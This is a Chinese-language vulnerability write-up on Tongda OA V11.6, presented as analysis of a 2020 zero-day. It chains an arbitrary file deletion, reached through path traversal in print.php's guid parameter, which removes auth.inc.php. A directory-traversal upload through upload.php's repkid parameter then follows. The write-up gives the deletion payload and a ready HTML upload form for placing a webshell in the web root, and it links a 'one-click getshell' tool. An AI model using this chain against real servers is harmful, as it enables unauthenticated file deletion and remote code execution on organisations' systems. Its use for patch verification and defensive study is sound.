通达OA任意文件删除&文件上传RCE分析(2020年hw 8月0day)
影响范围
通达OA V11.6
漏洞简介
通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传
漏洞分析
任意文件删除
漏洞触发点位于module/appbuilder/assets/print.php
$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];
if (file_exists($s_tmp)) {
$arr_data = unserialize(file_get_contents($s_tmp));
unlink($s_tmp);
$s_user = $arr_data["user"];
}
else {
echo "未知参数";
exit();
}
传入参数guid通过../进行目录穿越实现任意文件删除
payload:?guid=../../../webroot/inc/auth.inc.php
未授权访问任意文件上传
漏洞触发点位于general/data_center/utils/upload.php
第三行有个身份验证
include_once "inc/auth.inc.php";
我们已经通过任意文件删除漏洞将其删除,然后就进入上传点
部分上传代码如下
if ($action == "upload") {
if ($filetype == "xls") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/templates/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/templates")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/templates");
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $_FILES["FILE1"]["name"])) {
}
}
else if ($filetype == "img") {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/images/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/images")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/images");
}
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$p = strrpos($s_n, ".");
$s_n = CreateId() . substr($s_n, $p);
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
else {
$uploaddir = MYOA_ATTACH_PATH . "/data_center/attachment/";
if (!is_dir(MYOA_ATTACH_PATH . "/data_center/attachment")) {
if (!is_dir(MYOA_ATTACH_PATH . "/data_center")) {
mkdir(MYOA_ATTACH_PATH . "/data_center");
}
mkdir(MYOA_ATTACH_PATH . "/data_center/attachment");
}
if (isset($from_rep)) {
if (($from_rep != "") && ($from_rep[0] == "{")) {
$repkid = GetRepKIDBySendId($from_rep);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
}
}
}
else {
$arr = explode(",", $from_rep);
for ($i = 0; $i < count($arr); $i++) {
$p = strpos($arr[$i], ".");
$repno = substr($arr[$i], 0, $p);
$repkid = GetRepKIDByNo($repno);
if ($repkid != $to_rep) {
if (file_exists($uploaddir . "/" . $repkid . "_" . $filename)) {
copy($uploaddir . "/" . $repkid . "_" . $filename, $uploaddir . "/" . $to_rep . "_" . $filename);
break;
}
}
}
}
}
else {
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
}
}
@unlink($_FILES["FILE1"]);
}
这串代码首先得满足$action的值等于upload,然后便是根据不同的上传类型进行不同的操作,这里如果上传类型是xls或img时,上传的目录内容是不允许访问的,会403。所以我们选择最后一种上传方法,这个时候传入$filetype为其它值就行。
这个时候我们不传入$from_rep就会进入else里面,代码如下
$s_n = $_FILES["FILE1"]["name"];
if ($s_n[0] != "{") {
$s_n = $repkid . "_" . $s_n;
}
if (move_uploaded_file($_FILES["FILE1"]["tmp_name"], $uploaddir . $s_n)) {
}
可以看到传的文件名为FILE1,可以看到最终的上传路径是$repkid拼接在前,所以我们往$repkid传入../就可以实现上传到任意目录,比如网站根目录
祭出祖传html上传表单
<form action="http://192.168.117.131:8888/general/data_center/utils/upload.php" method="post" enctype="multipart/form-data">
<input type="text"name='filetype' value ='ghtwf01'></input>
<input type="text"name='action' value ='upload'></input>
<input type="text"name='repkid' value ='../../../'></input>
<input type="file" name="FILE1"></input>
<input type="submit" ></input>
</body>
</form>
一键getshell
https://github.com/ghtwf01/tdv11.6_rce
转载
分享
发布投稿
没有评论